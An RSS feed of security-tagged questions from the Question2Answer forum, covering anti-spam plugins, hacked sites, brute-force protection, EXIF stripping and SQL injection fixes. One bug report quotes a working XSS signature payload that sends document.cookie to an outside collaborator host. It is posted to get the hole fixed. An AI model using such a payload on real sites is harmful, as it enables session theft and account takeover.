<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
<title>Question2Answer Q&amp;A - Recent questions tagged security</title>
<link>https://www.question2answer.org/qa/tag/security</link>
<description>Powered by Question2Answer</description>
<item>
<title>[Free Plugin] Anti-Spam Register Shield - Block Bots Without CAPTCHAs!</title>
<link>https://www.question2answer.org/qa/124191/free-plugin-anti-spam-register-shield-block-without-captchas</link>
<description>

&lt;p&gt;Hello Q2A Community!&lt;/p&gt;

&lt;p&gt;Are you tired of automated spam bots registering on your forum, dropping SEO links in their profiles, and bypassing standard CAPTCHAs?&lt;/p&gt;

&lt;p&gt;I’m excited to share a new free plugin I’ve developed to solve this problem once and for all: &lt;strong&gt;Anti-Spam Register Shield&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img alt=&quot;&quot; src=&quot;https://www.question2answer.org/qa/?qa=blob&amp;amp;qa_blobid=16808100848296618345&quot; style=&quot;height:600px; width:600px&quot;&gt;&lt;/p&gt;

&lt;p&gt;Instead of relying on annoying CAPTCHAs that frustrate real users, this plugin operates silently in the background using smart &lt;strong&gt;Bot Traps&lt;/strong&gt; to eliminate automated registrations completely.&lt;/p&gt;

&lt;h3&gt;️ How It Works (The Mechanics)&lt;/h3&gt;

&lt;p&gt;Bots are programmed to fill out every field they find as quickly as possible. This plugin uses two clever mechanisms to catch them in the act:&lt;/p&gt;

&lt;ol&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;The Invisible Honeypot:&lt;/strong&gt; The plugin injects a hidden form field into the registration page. This field is completely invisible to human users (pushed off-screen using CSS), but bots scanning the HTML will see it and fill it out. If the registration is submitted with this field filled, the plugin instantly knows it's a bot and blocks the registration.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;The Time Trap:&lt;/strong&gt; A real human takes at least a few seconds to type their username, email, and password. A bot does this in milliseconds. The plugin embeds a hidden timestamp when the page loads. If the form is submitted faster than the minimum configured time (e.g., 4 seconds), the registration is rejected.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;

&lt;h3&gt;✨ Key Features&lt;/h3&gt;

&lt;ul&gt;

&lt;li&gt;&lt;strong&gt;Zero Friction for Humans:&lt;/strong&gt; Real users won't even know the plugin is there. No confusing images, no puzzles, no clicking on traffic lights.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;100% Standalone &amp;amp; Lightweight:&lt;/strong&gt; It doesn't require any API keys, third-party services (like Akismet), or AI. It executes locally with zero impact on your site's performance.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Highly Configurable:&lt;/strong&gt; You can easily adjust the &quot;Minimum Registration Time&quot; from the plugin's admin panel to suit your audience.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Compatible with Other CAPTCHAs:&lt;/strong&gt; You can use it alongside reCAPTCHA for an impenetrable double-layer defense.&lt;/li&gt;&lt;/ul&gt;

&lt;h3&gt;⚙️ Installation Instructions&lt;/h3&gt;

&lt;p&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; Download link:&amp;nbsp;&lt;a rel=&quot;nofollow&quot; href=&quot;https://www.mediafire.com/file/eat9s2sdbhzsehk/anti-spam-register.zip/file&quot;&gt;Download Here&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;

&lt;li&gt;Download the plugin folder and name it anti-spam-register.&lt;/li&gt;

&lt;li&gt;Upload the folder to your qa-plugin directory.&lt;/li&gt;

&lt;li&gt;Go to &lt;strong&gt;Admin &amp;gt; Plugins&lt;/strong&gt; in your Q2A dashboard.&lt;/li&gt;

&lt;li&gt;Locate &lt;strong&gt;Anti Spam Filter&lt;/strong&gt;, configure your minimum registration time (default is 4 seconds), and click &lt;strong&gt;Save Changes&lt;/strong&gt;.&lt;/li&gt;&lt;/ol&gt;

&lt;p&gt;Enjoy a cleaner, spam-free community! If you have any questions or suggestions for future updates, feel free to drop a reply below.&lt;/p&gt;

&lt;p&gt;
&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/124191/free-plugin-anti-spam-register-shield-block-without-captchas</guid>
<pubDate>Fri, 05 Jun 2026 07:46:18 +0000</pubDate>
</item>
<item>
<title>My website had hacked Request for Assistance with Website Security and 404 Errors</title>
<link>https://www.question2answer.org/qa/114289/website-hacked-request-assistance-website-security-errors</link>
<description>

&lt;p&gt;Request for Assistance with Website Security and 404 Errors
&lt;br&gt;
&lt;br&gt;My website was hacked, and I have deleted suspicious files, changed the password, and removed fake users. However, I am still unsure if the threat is completely gone. Additionally, the number of 404 errors has increased to over 5350 pages.
&lt;br&gt;&amp;nbsp;&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;I need your assistance with:&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;
&lt;br&gt;1. Ensuring the complete security of the website.
&lt;br&gt;2. Handling the large number of 404 errors.
&lt;br&gt;3. Improving the site's re-indexing and performance in search engines.
&lt;br&gt;
&lt;br&gt;I appreciate your guidance and advice on these matters.
&lt;br&gt;
&lt;br&gt;Thank you for your help.&lt;/p&gt;</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/114289/website-hacked-request-assistance-website-security-errors</guid>
<pubDate>Wed, 24 Jul 2024 21:13:36 +0000</pubDate>
</item>
<item>
<title>Define Password Policy</title>
<link>https://www.question2answer.org/qa/105580/define-password-policy</link>
<description>Hi&lt;br /&gt;
&lt;br /&gt;
Is it possible to define Password Policy? So a new user would have to follow it or existing user who change password.&lt;br /&gt;
&lt;br /&gt;
Maybe already plugin exists for that?</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/105580/define-password-policy</guid>
<pubDate>Wed, 04 Jan 2023 13:05:31 +0000</pubDate>
</item>
<item>
<title>Signature allow XSS</title>
<link>https://www.question2answer.org/qa/105012/signature-allow-xss</link>
<description>

&lt;p&gt;It's possible to inject JS into user's signature that leads to account takeover.&lt;/p&gt;

&lt;p&gt;Attackers change their signature to the following XSS payload and such JS will be executed is uses click such button.&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;Hi&amp;lt;button type=&quot;test&quot; formaction=&quot;javascript: alert('You have been hacked!'), fetch('&lt;a href=&quot;https://xxxxxxxxxxxxxxxxxxxx.oastify.com&quot; rel=&quot;nofollow&quot;&gt;https://xxxxxxxxxxxxxxxxxxxx.oastify.com&lt;/a&gt;?c=' +document.cookie)&quot;&amp;gt;CLICK HERE&amp;lt;/button&amp;gt;&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;See example from our forum.&lt;/p&gt;

&lt;p&gt;&lt;img alt=&quot;&quot; src=&quot;https://www.question2answer.org/qa/?qa=blob&amp;amp;qa_blobid=9731905953567589198&quot; style=&quot;height:260px; width:600px&quot;&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;Is there a solution to avoid this?&lt;/p&gt;

&lt;p&gt;We use following plugin for Signature:&amp;nbsp;&lt;a href=&quot;https://github.com/NoahY/q2a-signatures&quot; rel=&quot;nofollow&quot;&gt;https://github.com/NoahY/q2a-signatures&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Thanks.&lt;/p&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/105012/signature-allow-xss</guid>
<pubDate>Tue, 29 Nov 2022 13:42:06 +0000</pubDate>
</item>
<item>
<title>Remove exif data from users profile images</title>
<link>https://www.question2answer.org/qa/103255/remove-exif-data-from-users-profile-images</link>
<description>

&lt;p&gt;I got a request from a security team about uploaded images.&lt;/p&gt;

&lt;p&gt;They asked whether it is possible to clean out uploaded images from personal information.&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;When a user uploads an image, the uploaded image’s EXIF Geo location Data does not get stripped. As a result, anyone can get sensitive information of users like their Geo-location, their Device information like Device Name, Version, Software &amp;amp; Software version used, etc.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;Is there any way to process uploaded images and exclude such information from it?&lt;/p&gt;

&lt;p&gt;p.s. you can use&amp;nbsp;&lt;a href=&quot;https://exifdata.com/&quot; rel=&quot;nofollow&quot;&gt;https://exifdata.com/&lt;/a&gt; to read meta data of image.&lt;/p&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/103255/remove-exif-data-from-users-profile-images</guid>
<pubDate>Thu, 01 Sep 2022 09:19:21 +0000</pubDate>
</item>
<item>
<title>Brute force protection on reset password</title>
<link>https://www.question2answer.org/qa/102978/brute-force-protection-on-reset-password</link>
<description>

&lt;p&gt;Hi
&lt;br&gt;
&lt;br&gt;Our security teams noticed it is possible to takeover an account by brute forcing reset password functionality.&lt;/p&gt;

&lt;p&gt;Technically it is possible to do any number of requests (with code) on reset password page.&lt;/p&gt;

&lt;p&gt;&lt;img alt=&quot;&quot; src=&quot;https://www.question2answer.org/qa/?qa=blob&amp;amp;qa_blobid=14362801402744361131&quot; style=&quot;height:242px; width:600px&quot;&gt;&lt;/p&gt;

&lt;p&gt;&lt;/p&gt;

&lt;p&gt;Are there any plugins or maybe I simply do not know how to configure system properly?&lt;/p&gt;

&lt;p&gt;Thanks!&lt;/p&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/102978/brute-force-protection-on-reset-password</guid>
<pubDate>Wed, 17 Aug 2022 08:42:59 +0000</pubDate>
</item>
<item>
<title>What type of security issue is this</title>
<link>https://www.question2answer.org/qa/89391/what-type-of-security-issue-is-this</link>
<description>

&lt;div class=&quot;row&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-row; color: rgb(18, 18, 18); font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 12px;&quot;&gt;

&lt;div class=&quot;name&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; color: rgb(51, 51, 51); font-weight: bold; padding: 4px 8px; white-space: nowrap; display: table-cell; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204);&quot;&gt;Location&lt;/div&gt;

&lt;div class=&quot;value&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-cell; padding: 4px 0px; width: 1224px; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204); word-break: break-all;&quot;&gt;src\qa-include\app\format.php:272&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;row&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-row; color: rgb(18, 18, 18); font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 12px;&quot;&gt;

&lt;div class=&quot;name&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; color: rgb(51, 51, 51); font-weight: bold; padding: 4px 8px; white-space: nowrap; display: table-cell; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204);&quot;&gt;Source File&lt;/div&gt;

&lt;div class=&quot;value&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-cell; padding: 4px 0px; width: 1224px; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204); word-break: break-all;&quot;&gt;src\qa-include\app\format.php&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;row&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-row; color: rgb(18, 18, 18); font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 12px;&quot;&gt;

&lt;div class=&quot;name&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; color: rgb(51, 51, 51); font-weight: bold; padding: 4px 8px; white-space: nowrap; display: table-cell; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204);&quot;&gt;Availability Impact&lt;/div&gt;

&lt;div class=&quot;value&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-cell; padding: 4px 0px; width: 1224px; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204); word-break: break-all;&quot;&gt;Partial&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;row&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-row; color: rgb(18, 18, 18); font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 12px;&quot;&gt;

&lt;div class=&quot;name&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; color: rgb(51, 51, 51); font-weight: bold; padding: 4px 8px; white-space: nowrap; display: table-cell; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204);&quot;&gt;Confidentiality Impact&lt;/div&gt;

&lt;div class=&quot;value&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-cell; padding: 4px 0px; width: 1224px; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204); word-break: break-all;&quot;&gt;Partial&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;row&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-row; color: rgb(18, 18, 18); font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 12px;&quot;&gt;

&lt;div class=&quot;name&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; color: rgb(51, 51, 51); font-weight: bold; padding: 4px 8px; white-space: nowrap; display: table-cell; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204);&quot;&gt;Integrity Impact&lt;/div&gt;

&lt;div class=&quot;value&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-cell; padding: 4px 0px; width: 1224px; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204); word-break: break-all;&quot;&gt;Partial&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;row&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-row; color: rgb(18, 18, 18); font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 12px;&quot;&gt;

&lt;div class=&quot;name&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; color: rgb(51, 51, 51); font-weight: bold; padding: 4px 8px; white-space: nowrap; display: table-cell; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204);&quot;&gt;CWE:&lt;/div&gt;

&lt;div class=&quot;value&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-cell; padding: 4px 0px; width: 1224px; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204); word-break: normal;&quot;&gt;

&lt;ul style=&quot;list-style:none; margin:0px; overflow-wrap:break-word; padding-left:0px; padding-right:0px&quot;&gt;

&lt;li&gt;79&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;row&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-row; color: rgb(18, 18, 18); font-family: &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, sans-serif; font-size: 12px;&quot;&gt;

&lt;div class=&quot;name&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; color: rgb(51, 51, 51); font-weight: bold; padding: 4px 8px; white-space: nowrap; display: table-cell; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204);&quot;&gt;API:&lt;/div&gt;

&lt;div class=&quot;value&quot; style=&quot;overflow-wrap: break-word; text-overflow: ellipsis; display: table-cell; padding: 4px 0px; width: 1224px; vertical-align: top; border-bottom: 1px solid rgb(204, 204, 204); word-break: break-all;&quot;&gt;

&lt;table style=&quot;border-collapse:collapse; overflow-wrap:break-word; border-spacing: 0px;&quot;&gt;

&lt;tbody style=&quot;overflow-wrap: break-word;&quot;&gt;

&lt;tr style=&quot;overflow-wrap:break-word&quot;&gt;

&lt;td style=&quot;font-size:9pt; overflow-wrap:break-word; word-break:break-all&quot;&gt;Potential user controlled data within PHP converted to HTML&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&amp;lt;a href=&quot;' . qa_path_html('ip/' . $ip) . '&quot; title=&quot;' . qa_lang_html_sub('main/ip_address_x', qa_html($ip)) . '&quot; class=&quot;qa-ip-link&quot;&amp;gt;' . $anchorhtml . '&amp;lt;/a&amp;gt;&lt;/p&gt;</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/89391/what-type-of-security-issue-is-this</guid>
<pubDate>Thu, 26 Nov 2020 16:03:52 +0000</pubDate>
</item>
<item>
<title>Security issues in static analysis</title>
<link>https://www.question2answer.org/qa/89388/security-issues-in-static-analysis</link>
<description>When i scanned the project using Appscan source and also from SonarQube i am finding that almost 500 security XSS and other issues reported.&lt;br /&gt;
&lt;br /&gt;
version: 1.8.4 &lt;br /&gt;
&lt;br /&gt;
upgraded jquery to latest&lt;br /&gt;
&lt;br /&gt;
upgraded php to latest&lt;br /&gt;
&lt;br /&gt;
Scanned code again and i am finding that same number of issues again.&lt;br /&gt;
&lt;br /&gt;
Many of them are even coming from ckeditor code.</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/89388/security-issues-in-static-analysis</guid>
<pubDate>Thu, 26 Nov 2020 13:06:31 +0000</pubDate>
</item>
<item>
<title>How to move qa-config.php out of the directory as mentioned in security docs?</title>
<link>https://www.question2answer.org/qa/88820/how-move-config-php-out-the-directory-mentioned-security-docs</link>
<description>

&lt;p&gt;As mentioned in the security tutorial :&amp;nbsp;&lt;a href=&quot;https://docs.question2answer.org/install/security/&quot; rel=&quot;nofollow&quot;&gt;https://docs.question2answer.org/install/security/&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;&lt;span style=&quot;font-family:Helvetica,Arial,Sens-serif; font-size:14px&quot;&gt;Move the&amp;nbsp;&lt;/span&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot; style=&quot;color: rgb(51, 153, 51); font-size: 13px;&quot;&gt;qa-config.php&lt;/code&gt;&lt;span style=&quot;font-family:Helvetica,Arial,Sens-serif; font-size:14px&quot;&gt;&amp;nbsp;file to a location which is outside any directory served by your web server. Then create a new&amp;nbsp;&lt;/span&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot; style=&quot;color: rgb(51, 153, 51); font-size: 13px;&quot;&gt;qa-config.php&lt;/code&gt;&lt;span style=&quot;font-family:Helvetica,Arial,Sens-serif; font-size:14px&quot;&gt;&amp;nbsp;file in its place which references the old file using the&amp;nbsp;&lt;/span&gt;&lt;a rel=&quot;nofollow&quot; href=&quot;http://php.net/manual/en/function.require.php&quot; style=&quot;text-decoration-line: none; color: rgb(0, 102, 153); font-family: Helvetica, Arial, Sens-serif; font-size: 14px;&quot;&gt;require&lt;/a&gt;&lt;span style=&quot;font-family:Helvetica,Arial,Sens-serif; font-size:14px&quot;&gt;&amp;nbsp;PHP function. If your web server were to become misconfigured and start serving the raw code in&amp;nbsp;&lt;/span&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot; style=&quot;color: rgb(51, 153, 51); font-size: 13px;&quot;&gt;.php&lt;/code&gt;&lt;span style=&quot;font-family:Helvetica,Arial,Sens-serif; font-size:14px&quot;&gt;&amp;nbsp;files, this would ensure that your MySQL details remain hidden.&lt;/span&gt;&lt;/p&gt;

&lt;p&gt;&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;&lt;span style=&quot;font-family:Helvetica,Arial,Sens-serif; font-size:14px&quot;&gt;I am not able to understand or apply it... please help me. I want to make sure to maximize the security for my website.. I've customized&amp;nbsp;everything but this is the only thing I am not able to apply... it'll be very helpful to get an better and easy tutorial.&lt;/span&gt;&lt;/p&gt;</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/88820/how-move-config-php-out-the-directory-mentioned-security-docs</guid>
<pubDate>Mon, 02 Nov 2020 09:50:55 +0000</pubDate>
</item>
<item>
<title>&lt;script&gt; tags are not sanitized in extra question field?</title>
<link>https://www.question2answer.org/qa/85438/script-tags-are-not-sanitized-in-extra-question-field</link>
<description>Just to bring this to your awareness that Q2A does not sanitize the extra field input.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;script&amp;gt; tags and other harmful tags may still exist in your database.&lt;br /&gt;
&lt;br /&gt;
If you are trying to display the content of this extra field, for example, you want to display it on question lists, or in a widget, you may accidentally execute those scripts.</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/85438/script-tags-are-not-sanitized-in-extra-question-field</guid>
<pubDate>Mon, 29 Jun 2020 18:30:18 +0000</pubDate>
</item>
<item>
<title>Prevent sql injection in q2a custom php form ?</title>
<link>https://www.question2answer.org/qa/82413/prevent-sql-injection-in-q2a-custom-php-form</link>
<description>

&lt;p&gt;This is how i store data in mysql via php form. I know its security risk.&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;Examples - $price = $_POST['price'];&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;OR&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;$price = array_key_exists('price', $_POST) ? $_POST['price'] : &quot;&quot;;&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;and sql query is -&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;$insertqry = qa_db_query_sub(&quot;INSERT INTO test_table (title, price) VALUES ('$title','$price')&quot;);&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;How should i post data in latest php 7 and above version ?
&lt;br&gt;I think escape string is deprecated or outdated.&lt;/p&gt;

&lt;p&gt;Thanks for your help !&lt;/p&gt;</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/82413/prevent-sql-injection-in-q2a-custom-php-form</guid>
<pubDate>Tue, 31 Mar 2020 19:33:04 +0000</pubDate>
</item>
<item>
<title>Problems with reCaptcha continue. How do I get it working?</title>
<link>https://www.question2answer.org/qa/76967/problems-with-recaptcha-continue-how-do-i-get-it-working</link>
<description>Using the built in reCaptcha in the latest version of Q2A, I can't get it to work. I have tried with my site set to secure and non-secure to check if it was a security issue. It does not appear to be. The keys go in fine (have tried v2, v3 and all variants of v2 as well) and every time someone tries to register it comes up with &amp;quot;Please complete the anti-spam verification&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
There are others who have asked this question but with no solutions. I am running Apache, latest PHP on a Windows Server VPS backend.&lt;br /&gt;
&lt;br /&gt;
I have tried different hosting platforms as well and nothing is working. I am so frustrated but more than happy to try any suggestions. Thanks in advance.</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/76967/problems-with-recaptcha-continue-how-do-i-get-it-working</guid>
<pubDate>Sat, 03 Aug 2019 11:12:49 +0000</pubDate>
</item>
<item>
<title>from http to https plugin</title>
<link>https://www.question2answer.org/qa/71683/from-http-to-https-plugin</link>
<description>Can someone please make this plugin if possible.&lt;br /&gt;
&lt;br /&gt;
A plugin that should be able to convert all q2a urls to use https by default</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/71683/from-http-to-https-plugin</guid>
<pubDate>Tue, 08 Jan 2019 08:54:14 +0000</pubDate>
</item>
<item>
<title>Is it completely safe 1.8?</title>
<link>https://www.question2answer.org/qa/69811/is-it-completely-safe-1-8</link>
<description>Hello there.&lt;br /&gt;
&lt;br /&gt;
I was using version 1.7.5 before. There were thousands of users and thousands of questions. One day, the hacker site in another country uploaded our index file. What I'm saying is, is this an attack like this in the 1.8 version I'm using right now? What should I do if there is an attack?&lt;br /&gt;
&lt;br /&gt;
Let me ask you: can I find out if there is a file vulnerability on the site?&lt;br /&gt;
&lt;br /&gt;
So, if they want to change the index file again, can they do that? Is it completely safe for 1.8?&lt;br /&gt;
&lt;br /&gt;
I am using translation, sorry.</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/69811/is-it-completely-safe-1-8</guid>
<pubDate>Fri, 30 Nov 2018 02:33:39 +0000</pubDate>
</item>
<item>
<title>The use of CKEditor is it safe?</title>
<link>https://www.question2answer.org/qa/68957/the-use-of-ckeditor-is-it-safe</link>
<description>A lot of information on the vulnerability of old versions. What recommendations or should I change the editor?</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/68957/the-use-of-ckeditor-is-it-safe</guid>
<pubDate>Tue, 06 Nov 2018 09:07:51 +0000</pubDate>
</item>
<item>
<title>Using qa_db_query_sub with a MYSQL LIKE &quot;%abc%&quot;</title>
<link>https://www.question2answer.org/qa/67362/using-qa_db_query_sub-with-a-mysql-like-%25abc%25</link>
<description>

&lt;p&gt;Using a query like this:&amp;nbsp;&lt;/p&gt;

&lt;pre&gt;&lt;strong&gt;$postdata = qa_db_read_one_assoc(
qa_db_query_sub('
  SELECT userid, content FROM ^posts 
  WHERE content LIKE &quot;%'.$word.'%&quot;
)
);&lt;/strong&gt;&lt;/pre&gt;

&lt;p&gt;will bring security issues.&lt;/p&gt;

&lt;p&gt;I'd like to use the &lt;strong&gt;$ &quot;placeholder&quot;&lt;/strong&gt;&amp;nbsp;to insert the $word and have a secure query. But:&lt;/p&gt;

&lt;pre&gt;&lt;strong&gt;$postdata = qa_db_read_one_assoc(
qa_db_query_sub('
  SELECT userid, content FROM ^posts 
  WHERE content LIKE $
), &quot;%'.$word.'%&quot;
);&lt;/strong&gt;&lt;/pre&gt;

&lt;p&gt;Does not work.&lt;/p&gt;

&lt;p&gt;Is there any way of how to get the % as MYSQL part into the query &lt;strong&gt;and&lt;/strong&gt;&amp;nbsp;use the $ for the qa_db_query_sub().&lt;/p&gt;</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/67362/using-qa_db_query_sub-with-a-mysql-like-%25abc%25</guid>
<pubDate>Wed, 19 Sep 2018 06:51:34 +0000</pubDate>
</item>
<item>
<title>I am getting this error when i save a setting in Admin panel: XSS AUDITOR error</title>
<link>https://www.question2answer.org/qa/66658/getting-this-error-when-save-setting-admin-panel-auditor-error</link>
<description>

&lt;p&gt;&lt;img alt=&quot;&quot; src=&quot;https://www.bmyers.com/members/images/5182c.gif?cb=20180515035712&quot; style=&quot;height:468px; width:655px&quot;&gt;Please help. Is this a big concern??&lt;/p&gt;</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/66658/getting-this-error-when-save-setting-admin-panel-auditor-error</guid>
<pubDate>Mon, 27 Aug 2018 19:41:22 +0000</pubDate>
</item>
<item>
<title>Mails sent are not encrypted</title>
<link>https://www.question2answer.org/qa/66468/mails-sent-are-not-encrypted</link>
<description>

&lt;p&gt;Just saw that the emails sent by my website are shown in GMAIL as non-encrypted.&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;&lt;span style=&quot;color:rgb(197, 57, 41)&quot;&gt;did not encrypt this message&lt;/span&gt;&amp;nbsp;&lt;a target=&quot;_blank&quot; rel=&quot;nofollow&quot; href=&quot;https://support.google.com/mail?hl=en&amp;amp;p=tls&quot;&gt;Learn more&lt;/a&gt;&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;And the tooltip:&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;&lt;span style=&quot;color:rgb(34, 34, 34); font-family:consolas,lucida console,courier new,monospace; font-size:12px&quot;&gt;Gmail couldn't verify that xxx&amp;nbsp;actually sent this message (and not a spammer).&lt;/span&gt;&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;Now I am wondering how to get this done by PHPMailer - without using SMTP.&lt;/p&gt;

&lt;p&gt;Or is SMTP the only way? (I tried once to set it up, but somehow failed.)&lt;/p&gt;</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/66468/mails-sent-are-not-encrypted</guid>
<pubDate>Tue, 21 Aug 2018 06:25:34 +0000</pubDate>
</item>
<item>
<title>How to add security question to check spamer for registration page.</title>
<link>https://www.question2answer.org/qa/64714/how-add-security-question-check-spamer-for-registration-page</link>
<description></description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/64714/how-add-security-question-check-spamer-for-registration-page</guid>
<pubDate>Sat, 23 Jun 2018 20:17:14 +0000</pubDate>
</item>
<item>
<title>Is there any way to limit login attempt?</title>
<link>https://www.question2answer.org/qa/63024/is-there-any-way-to-limit-login-attempt</link>
<description>Is there any plugin or feature available for more security. site can be bruteforced easily. How can i prevent such attacks</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/63024/is-there-any-way-to-limit-login-attempt</guid>
<pubDate>Fri, 23 Mar 2018 02:29:20 +0000</pubDate>
</item>
</channel>
</rss>